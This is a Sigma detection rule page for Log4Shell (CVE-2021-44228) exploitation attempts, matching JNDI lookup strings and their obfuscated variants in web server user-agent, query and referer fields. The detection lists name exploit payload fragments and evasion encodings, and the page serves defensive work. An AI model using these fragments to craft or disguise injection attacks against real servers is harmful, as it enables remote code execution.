Log4j RCE CVE-2021-44228 in Fields
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
Sigma rule (View on GitHub)
1title: Log4j RCE CVE-2021-44228 in Fields
2id: 9be472ed-893c-4ec0-94da-312d2765f654
3status: test
4description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
5references:
6 - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
7 - https://news.ycombinator.com/item?id=29504755
8 - https://github.com/tangxiaofeng7/apache-log4j-poc
9 - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
10 - https://github.com/YfryTchsGD/Log4jAttackSurface
11 - https://twitter.com/shutingrz/status/1469255861394866177?s=21
12author: Florian Roth (Nextron Systems)
13date: 2021-12-10
14modified: 2023-01-02
15tags:
16 - attack.initial-access
17 - attack.t1190
18 - cve.2021-44228
19 - detection.emerging-threats
20logsource:
21 category: webserver
22detection:
23 selection1:
24 cs-user-agent|contains:
25 - '${jndi:ldap:/'
26 - '${jndi:rmi:/'
27 - '${jndi:ldaps:/'
28 - '${jndi:dns:/'
29 - '/$%7bjndi:'
30 - '%24%7bjndi:'
31 - '$%7Bjndi:'
32 - '%2524%257Bjndi'
33 - '%2F%252524%25257Bjndi%3A'
34 - '${jndi:${lower:'
35 - '${::-j}${'
36 - '${jndi:nis'
37 - '${jndi:nds'
38 - '${jndi:corba'
39 - '${jndi:iiop'
40 - 'Reference Class Name: foo'
41 - '${${env:BARFOO:-j}'
42 - '${::-l}${::-d}${::-a}${::-p}'
43 - '${base64:JHtqbmRp'
44 - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
45 - '${${lower:j}ndi:'
46 - '${${upper:j}ndi:'
47 - '${${::-j}${::-n}${::-d}${::-i}:'
48 # selection2:
49 # user-agent|contains:
50 # - '${jndi:ldap:/'
51 # - '${jndi:rmi:/'
52 # - '${jndi:ldaps:/'
53 # - '${jndi:dns:/'
54 # - '/$%7bjndi:'
55 # - '%24%7bjndi:'
56 # - '$%7Bjndi:'
57 # - '%2524%257Bjndi'
58 # - '%2F%252524%25257Bjndi%3A'
59 # - '${jndi:${lower:'
60 # - '${::-j}${'
61 # - '${jndi:nis'
62 # - '${jndi:nds'
63 # - '${jndi:corba'
64 # - '${jndi:iiop'
65 # - 'Reference Class Name: foo'
66 # - '${${env:BARFOO:-j}'
67 # - '${::-l}${::-d}${::-a}${::-p}'
68 # - '${base64:JHtqbmRp'
69 # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
70 # - '${${lower:j}ndi:'
71 # - '${${upper:j}ndi:'
72 # - '${${::-j}${::-n}${::-d}${::-i}:'
73 selection3:
74 cs-uri-query|contains:
75 - '${jndi:ldap:/'
76 - '${jndi:rmi:/'
77 - '${jndi:ldaps:/'
78 - '${jndi:dns:/'
79 - '/$%7bjndi:'
80 - '%24%7bjndi:'
81 - '$%7Bjndi:'
82 - '%2524%257Bjndi'
83 - '%2F%252524%25257Bjndi%3A'
84 - '${jndi:${lower:'
85 - '${::-j}${'
86 - '${jndi:nis'
87 - '${jndi:nds'
88 - '${jndi:corba'
89 - '${jndi:iiop'
90 - 'Reference Class Name: foo'
91 - '${${env:BARFOO:-j}'
92 - '${::-l}${::-d}${::-a}${::-p}'
93 - '${base64:JHtqbmRp'
94 - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
95 - '${${lower:j}ndi:'
96 - '${${upper:j}ndi:'
97 - '${${::-j}${::-n}${::-d}${::-i}:'
98 selection4:
99 cs-referer|contains:
100 - '${jndi:ldap:/'
101 - '${jndi:rmi:/'
102 - '${jndi:ldaps:/'
103 - '${jndi:dns:/'
104 - '/$%7bjndi:'
105 - '%24%7bjndi:'
106 - '$%7Bjndi:'
107 - '%2524%257Bjndi'
108 - '%2F%252524%25257Bjndi%3A'
109 - '${jndi:${lower:'
110 - '${::-j}${'
111 - '${jndi:nis'
112 - '${jndi:nds'
113 - '${jndi:corba'
114 - '${jndi:iiop'
115 - 'Reference Class Name: foo'
116 - '${${env:BARFOO:-j}'
117 - '${::-l}${::-d}${::-a}${::-p}'
118 - '${base64:JHtqbmRp'
119 - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
120 - '${${lower:j}ndi:'
121 - '${${upper:j}ndi:'
122 - '${${::-j}${::-n}${::-d}${::-i}:'
123 condition: 1 of selection*
124falsepositives:
125 - Vulnerability scanning
126level: high
References
-
Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to fix Log4Shell, why it's bad, and what a working exploit requires in this post.
Read More -
To folks wondering what the issue is about, I'll give a short summary that I myself needed. Typically a logging library has one job to do: swallow the string as if it's some black box and spit it e...
Read More -
Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
Read More -
Log4j RCE CVE-2021-44228 Exploitation Detection. GitHub Gist: instantly share code, notes, and snippets.
Read More -
Related rules
- ADSelfService Exploitation
- Apache Spark Shell Command Injection - Weblogs
- Arcadyan Router Exploitations
- Atlassian Bitbucket Command Injection Via Archive API
- CVE-2010-5278 Exploitation Attempt